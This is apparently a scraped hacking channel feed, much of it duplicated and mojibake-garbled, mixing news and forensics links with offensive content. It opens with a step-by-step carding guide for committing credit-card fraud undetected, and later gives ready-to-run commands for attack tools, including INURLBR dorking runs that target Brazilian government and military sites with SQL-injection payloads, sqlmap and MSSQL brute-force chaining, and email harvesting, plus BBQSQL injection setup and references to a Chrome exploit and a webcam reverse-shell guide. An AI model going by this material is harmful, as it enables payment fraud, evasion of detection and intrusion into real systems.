β β β Uππ»βΊπ«6π¬πβ β β β
π¦#FastTips :Much Required Advice for Beginners :
(#carding tips)
1οΈβ£ Using socks5 that fit the billing address of the cardholder (dont using socks4 or http proxies because they can leak DNS info).
2οΈβ£If your CC comes from UK, try using a drop in UK and so on for other countries
3οΈβ£If there is a gift choice, place it so it looks like you're sending a present to some buddy, girlfriend and so on.
4οΈβ£ Seek to render requests such as valentines before holidays etc. That's an ancient strategy now but it works for 2 purposes. These days the shops are having a ton of requests, and they can transfer one of the scams as genuine as well. So it seems as though you are giving a legit gift
5οΈβ£ Using cracked / open wifi + modified MAC, VPN in some offshore country + 2-3 sockets in a virtual machine for your protection. I recommend you import VMWare and a ready-made file to launch it. Attempt to build your own encryption proxy chain, with the last external IP that fits the address of the cardholders.
6οΈβ£Using Firefox with Plugins in private mode. Found several extensions relevant to protection that do not control connections, transparent cookies, LSO & flash cookies, etc. Be imaginative, and learn.
7οΈβ£Use gmail / hotmail / yahoo when ordering or Use @some hipster email provider, one that many people don't really use. It does make things seem legal.
8οΈβ£Attempt also to card on Weekends as shops unable to touch and search Extra bank info, by calling them. You may even test the time the closes Bank
9οΈβ£Please send an email to the vendor shortly after finishing the order to ship.
πFast as you desperately need it, as there is some purpose in your building.
1οΈβ£1οΈβ£Do not use a cc on the same site with separate Accounts.
Full record: 3-4 Years max.
1οΈβ£2οΈβ£ When you use the pp in carding instead purchase pp with email
access and remove the order linked emails from the email inbox and trash box
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#FastTips :Much Required Advice for Beginners :
(#carding tips)
1οΈβ£ Using socks5 that fit the billing address of the cardholder (dont using socks4 or http proxies because they can leak DNS info).
2οΈβ£If your CC comes from UK, try using a drop in UK and so on for other countries
3οΈβ£If there is a gift choice, place it so it looks like you're sending a present to some buddy, girlfriend and so on.
4οΈβ£ Seek to render requests such as valentines before holidays etc. That's an ancient strategy now but it works for 2 purposes. These days the shops are having a ton of requests, and they can transfer one of the scams as genuine as well. So it seems as though you are giving a legit gift
5οΈβ£ Using cracked / open wifi + modified MAC, VPN in some offshore country + 2-3 sockets in a virtual machine for your protection. I recommend you import VMWare and a ready-made file to launch it. Attempt to build your own encryption proxy chain, with the last external IP that fits the address of the cardholders.
6οΈβ£Using Firefox with Plugins in private mode. Found several extensions relevant to protection that do not control connections, transparent cookies, LSO & flash cookies, etc. Be imaginative, and learn.
7οΈβ£Use gmail / hotmail / yahoo when ordering or Use @some hipster email provider, one that many people don't really use. It does make things seem legal.
8οΈβ£Attempt also to card on Weekends as shops unable to touch and search Extra bank info, by calling them. You may even test the time the closes Bank
9οΈβ£Please send an email to the vendor shortly after finishing the order to ship.
πFast as you desperately need it, as there is some purpose in your building.
1οΈβ£1οΈβ£Do not use a cc on the same site with separate Accounts.
Full record: 3-4 Years max.
1οΈβ£2οΈβ£ When you use the pp in carding instead purchase pp with email
access and remove the order linked emails from the email inbox and trash box
CARDING IS FOR LEARN, NOT FOR STEAL !!!Share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 webhacking-
- find admin login pages and EAR vulnerabilites.
-Termux/Linux
π¦Features :
> Multi-threading on demand
> Big path list (482 paths)
> Supports php, asp and html extensions
> Checks for potential EAR vulnerabilites
> Checks for robots.txt
> Support for custom patns
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/s0md3v/Breacher.git
2οΈβ£cd Breacher
3οΈβ£EXAMPLES :
> Check all paths with php extension
python breacher -u example.com --type php
> Check all paths with php extension with threads
python breacher -u example.com --type php --fast
> Check all paths without threads
python breacher -u example.com
> Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:
python breacher -u example.com --path /data
π¦STILL TROUBLE ?
> https://youtu.be/BEpt5JmcWPk
enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 webhacking-
- find admin login pages and EAR vulnerabilites.
-Termux/Linux
π¦Features :
> Multi-threading on demand
> Big path list (482 paths)
> Supports php, asp and html extensions
> Checks for potential EAR vulnerabilites
> Checks for robots.txt
> Support for custom patns
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/s0md3v/Breacher.git
2οΈβ£cd Breacher
3οΈβ£EXAMPLES :
> Check all paths with php extension
python breacher -u example.com --type php
> Check all paths with php extension with threads
python breacher -u example.com --type php --fast
> Check all paths without threads
python breacher -u example.com
> Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:
python breacher -u example.com --path /data
π¦STILL TROUBLE ?
> https://youtu.be/BEpt5JmcWPk
enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - s0md3v/Breacher: An advanced multithreaded admin panel finder written in python.
An advanced multithreaded admin panel finder written in python. - s0md3v/Breacher
β β β Uππ»βΊπ«6π¬πβ β β β
π¦BEST 2020 BROWSER LOG CLEANER(Carding) & System logs REMOVER :
BleachBit cleans files to free disk space and to maintain privacy.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
-PARROT
-KALI
-UBUNTU
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦BEST 2020 BROWSER LOG CLEANER(Carding) & System logs REMOVER :
BleachBit cleans files to free disk space and to maintain privacy.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/bleachbit/bleachbit.gitπ¦TESTED ON':
2οΈβ£cd bleachbit
3οΈβ£Then install via make command
> make -C po local # build translations
4οΈβ£python3 bleachbit.py
5οΈβ£For information regarding the command line interface, run:
> python3 bleachbit.py --help
-PARROT
-KALI
-UBUNTU
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
2020 Bug chrome metas.rb
12.1 KB
2020 Bug Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)
-USE FOR LEARN !!β β β Uππ»βΊπ«6π¬πβ β β β
π¦How Run Python Hacking Scripts Via windows :
#FastTips
1οΈβ£Download
> https://www.python.org/downloads/windows/
2οΈβ£Run setup file
3οΈβ£Download :
https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16
4οΈβ£run setup
video tutorial :
> https://www.youtube.com/watch?v=n5sJ4EewKGk&autoplay=1
5οΈβ£Go powerShell and type :
> pip install --upgrade setuptools
6οΈβ£Now you can install git:
https://git-scm.com/download/win
(Download & run)
& more libs from powershell
& load and Python Script
ENJOY β€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How Run Python Hacking Scripts Via windows :
#FastTips
1οΈβ£Download
> https://www.python.org/downloads/windows/
2οΈβ£Run setup file
3οΈβ£Download :
https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16
4οΈβ£run setup
video tutorial :
> https://www.youtube.com/watch?v=n5sJ4EewKGk&autoplay=1
5οΈβ£Go powerShell and type :
> pip install --upgrade setuptools
6οΈβ£Now you can install git:
https://git-scm.com/download/win
(Download & run)
& more libs from powershell
& load and Python Script
ENJOY β€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Python.org
Python Releases for Windows
The official home of the Python Programming Language
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Linux-Termux tip :
What is BBQSQL?
> Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
βExample :
You need to provide the following placeholders of information in order for the attack to work. Once you put these in your query, bbqSQL will do the rest:
${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
${char_index}: This tells bbqSQL which character from the subselect to query.
${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.
Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.
6οΈβ£FOR MORE EXAMPLES :
https://github.com/Neohapsis/bbqsql#install
π¦Features :
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Linux-Termux tip :
What is BBQSQL?
> Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
> BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/Neohapsis/bbqsql.git5οΈβ£The query syntax is based around placeholders which tell BBQSQL how to execute the attack ?
2οΈβ£cd bbqsql
3οΈβ£install in one command :
sudo pip install bbqsql (kali-parrot repo)
4οΈβ£for termux
> python setup.py install
βExample :
You need to provide the following placeholders of information in order for the attack to work. Once you put these in your query, bbqSQL will do the rest:
${row_index}: This tells bbqSQL to iterate rows here. Since we are using LIMIT we can view n number of row depending on ${row_index} value.
${char_index}: This tells bbqSQL which character from the subselect to query.
${char_val}: This tells bbqSQL where to compare the results from the subselect to validate the result.
${comparator}: This is how you tell BBQSQL to compare the responses to determine if the result is true or not. By default, the > symbol is used.
${sleep}: This is optional but tells bbqSQL where to insert the number of seconds to sleep when performing time based SQL injection.
Not all of these place holders are required. For example, if you have discovered semi-blind boolean based SQL injection you can omit the ${sleep} parameter.
6οΈβ£FOR MORE EXAMPLES :
https://github.com/Neohapsis/bbqsql#install
π¦Features :
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies
ENJOY β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - CiscoCXSecurity/bbqsql: SQL Injection Exploitation Tool
SQL Injection Exploitation Tool. Contribute to CiscoCXSecurity/bbqsql development by creating an account on GitHub.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Privilege Escalationβ οΈMethodes & Tools :
> [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE
> [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation
> [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)
> [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb
> [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows
> [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors
> [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation
> [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation Γ’β¬β Tradecraft Security Weekly (Video)
> [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script
> [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered
> [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable
> [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS
> [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.
> [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script
> [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation
> [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux
> [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Privilege Escalationβ οΈMethodes & Tools :
> [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE
> [A GUIDE TO LINUX PRIVILEGE ESCALATION](https://payatu.com/guide-linux-privilege-escalation/) | Basics of Linux privilege escalation
> [Abusing SUDO (Linux Privilege Escalation)](http://touhidshaikh.com/blog/?p=790) | Abusing SUDO (Linux Privilege Escalation)
> [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb
> [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows
> [Common Windows Privilege Escalation Vectors](https://www.toshellandback.com/2015/11/24/ms-priv-esc/) | Common Windows Privilege Escalation Vectors
> [Editing /etc/passwd File for Privilege Escalation](http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) | Editing /etc/passwd File for Privilege Escalation
> [Linux Privilege Escalation ](https://securityweekly.com/2017/12/17/linux-privilege-escalation-tradecraft-security-weekly-22/) | Linux Privilege Escalation Γ’β¬β Tradecraft Security Weekly (Video)
> [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script
> [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered
> [Linux Privilege Escalation Using PATH Variable](http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/) | Linux Privilege Escalation Using PATH Variable
> [Linux Privilege Escalation using Misconfigured NFS](http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/) | Linux Privilege Escalation using Misconfigured NFS
> [Linux Privilege Escalation via Dynamically Linked Shared Object Library](https://www.contextis.com/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library) | How RPATH and Weak File Permissions can lead to a system compromise.
> [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script
> [OSCP - Windows Priviledge Escalation](http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html) | Common Windows Priviledge Escalation
> [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux
> [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Online News Sources :
> InfoSec | covers all the latest infosec topics
> Recent Hash Leaks | great place to lookup hashes
> Security Intell | covers all kinds of news, great intelligence resources
> Threatpost | covers all the latest threats and breaches
> Secjuice
> The Hacker News | features a daily stream of hack news, also has an app
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦#Online News Sources :
> InfoSec | covers all the latest infosec topics
> Recent Hash Leaks | great place to lookup hashes
> Security Intell | covers all kinds of news, great intelligence resources
> Threatpost | covers all the latest threats and breaches
> Secjuice
> The Hacker News | features a daily stream of hack news, also has an app
ENJOY β€οΈππ»
β Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Infosecurity Magazine
Infosecurity Magazine - Strategy, Insight, Technology
The award winning online magazine dedicated to the strategy, insight and technology of information security
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some resources for Beginers :
- How to Become a Successful Bug Bounty Hunter
- Researcher Resources - How to become a Bug Bounty Hunter
- Bug Bounties 101
- The life of a bug bounty hunter
- Awsome list of bugbounty cheatsheets
- Getting Started - Bug Bounty Hunter Methodology
:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some resources for Beginers :
- How to Become a Successful Bug Bounty Hunter
- Researcher Resources - How to become a Bug Bounty Hunter
- Bug Bounties 101
- The life of a bug bounty hunter
- Awsome list of bugbounty cheatsheets
- Getting Started - Bug Bounty Hunter Methodology
:)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
HackerOne
How to Become a Successful Bug Bounty Hunter
Anyone with computer skills and high degree of curiosity can become a successful finder of vulnerabilities. Hereβs how I started.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?Β΄0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'
./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?Β΄0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'
./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?Β΄'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'
./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?Β΄0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'
./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦SCANNER-INURLBR -Termux-Linux :
> Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found..->
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
git clone https://github.com/googleinurl/SCANNER-INURLBR.git
2οΈβ£cd SCANNER-INURLBR
3οΈβ£$chmod +x inurlbr.php
4οΈβ£ ./inurlbr.php
5οΈβ£To get a list of basic options and switches use:
php inurlbr.php -h
6οΈβ£SOME EXAMPLES :./inurlbr.php --dork 'inurl:php?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'inurl:aspx?id=' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork 'index of wp-content/uploads' -s save.txt -q 1,6,2,4 -t 2 --exploit-get '?' -a 'Index of /wp-content/uploads'
./inurlbr.php --dork 'site:.mil.br intext:(confidencial) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'confidencial'
./inurlbr.php --dork 'site:.mil.br intext:(secreto) ext:pdf' -s save.txt -q 1,6 -t 2 --exploit-get '?' -a 'secreto'
./inurlbr.php --dork 'site:br inurl:aspx (id|new)' -s save.txt -q 1,6 -t 1 --exploit-get "?Β΄'%270x27;"
./inurlbr.php --dork '.new.php?new id' -s save.txt -q 1,6,7,2,3 -t 1 --exploit-get '+UNION+ALL+SELECT+1,concat(0x3A3A4558504C4F49542D5355434553533A3A,@@version),3,4,5;' -a '::EXPLOIT-SUCESS::'
./inurlbr.php --dork 'new.php?id=' -s teste.txt --exploit-get ?Β΄0x27 --command-vul 'nmap sV -p 22,80,21 TARGET'
./inurlbr.php --dork 'site:pt inurl:aspx (id|q)' -s bruteforce.txt --exploit-get ?Β΄0x27 --command-vul 'msfcli auxiliary/scanner/mssql/mssqllogin RHOST=TARGETIP MSSQLUSER=inurlbr MSSQLPASSFILE=/home/pedr0/Documentos/passwords E'
./inurlbr.php --dork 'site:br inurl:id & inurl:php' -s get.txt --exploit-get "?Β΄'%270x27;" --command-vul 'python ../sqlmap/sqlmap.py -u "TARGETFULL" --dbs'
./inurlbr.php --dork 'inurl:index.php?id=' -q 1,2,10 --exploit-get "'?Β΄0x27'" -s report.txt --command-vul 'nmap -Pn -p 1-8080 --script http-enum --open TARGET'
./inurlbr.php --dork 'site:.gov.br email' -s reg.txt -q 1 --regexp '(\w\d\.\-\_+)@(\w\d\.\_\-+)'
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s emails.txt -m
./inurlbr.php --dork 'site:.gov.br email (gmail|yahoo|hotmail) ext:txt' -s urls.txt -u
./inurlbr.php --dork 'site:gov.bo' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork 'site:.uk' -s uk.txt --user-agent 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)'
./inurlbr.php --dork-file 'dorksSqli.txt' -s govs.txt --exploit-all-id 1,2,6
./inurlbr.php --dork-file 'dorksSqli.txt' -s sqli.txt --exploit-all-id 1,2,6 --irc 'irc.rizon.net#inurlbrasil'
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
IDS, IPS AND FIREWALL EVASION USING NMAP .pdf
1.1 MB
IDS, IPS AND FIREWALL EVASION USING NMAP- full guide -
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Developers added a series of RISC-V UEFI support patches for Linux
#UndercodeNews
> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed to form a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, some developers have submitted a series of patches to solve a large number of problems while adding some new capabilities to support RISC-V UEFI under Linux.
> Developer Atish Patra is from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common efi and riscv issues; patches 7-9 add Efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different code; patch 11 adds runtime services for RISC-V.
π¦To sum up, the main contributions of this series of patches are:
βAdded full ioremap support.
βAdded efi runtime service support.
βFixed the mm problem.
> At present, the patch has been verified on Qemu using the bootefi command in U-Boot, and has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems of EDK2 code on RISC-V are still being solved, mainly the problems related to SPI and network driver.
> This series of patches hits the Linux kernel 5.8-rc2 and is still in the PR state, waiting for the code review. If the related issues are resolved and finally accepted, then it should be visible when Linux 5.8 is released.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Developers added a series of RISC-V UEFI support patches for Linux
#UndercodeNews
> Earlier this year, the UEFI code in Linux has been cleaned up, and then a series of early patches for RISC-V UEFI support were proposed to form a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, some developers have submitted a series of patches to solve a large number of problems while adding some new capabilities to support RISC-V UEFI under Linux.
> Developer Atish Patra is from Western Digital. He submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common efi and riscv issues; patches 7-9 add Efi stub support for RISC-V was submitted for review in April; patch 10 renamed arm-init so that the foundation can be used in different code; patch 11 adds runtime services for RISC-V.
π¦To sum up, the main contributions of this series of patches are:
βAdded full ioremap support.
βAdded efi runtime service support.
βFixed the mm problem.
> At present, the patch has been verified on Qemu using the bootefi command in U-Boot, and has passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems of EDK2 code on RISC-V are still being solved, mainly the problems related to SPI and network driver.
> This series of patches hits the Linux kernel 5.8-rc2 and is still in the PR state, waiting for the code review. If the related issues are resolved and finally accepted, then it should be visible when Linux 5.8 is released.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Break webcam-cctv like expert .pdf
2.4 MB
Control webcam via reverse shell !pro
β β β Uππ»βΊπ«6π¬πβ β β β
π¦ New 2020 Linux Distributions-Good for any Linux developer :
[The Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 (32-bit) and x86_64 (64-bit) versions are available.
Computer Aided Investigative Environment (CAINE) - Contains numerous tools that help investigators during their analysis, including forensic evidence collection.
[CCF-VM](https://github.com/rough007/CCF-VM) - CyLR CDQR Forensics Virtual Machine (CCF-VM): An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously.
Digital Evidence & Forensics Toolkit (DEFT) - Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit (DART) for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
[NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
PALADIN - Modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included.
[Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Special Linux distro aimed at network security monitoring featuring advanced analysis tools.
SANS Investigative Forensic Toolkit (SIFT) Workstation - Demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
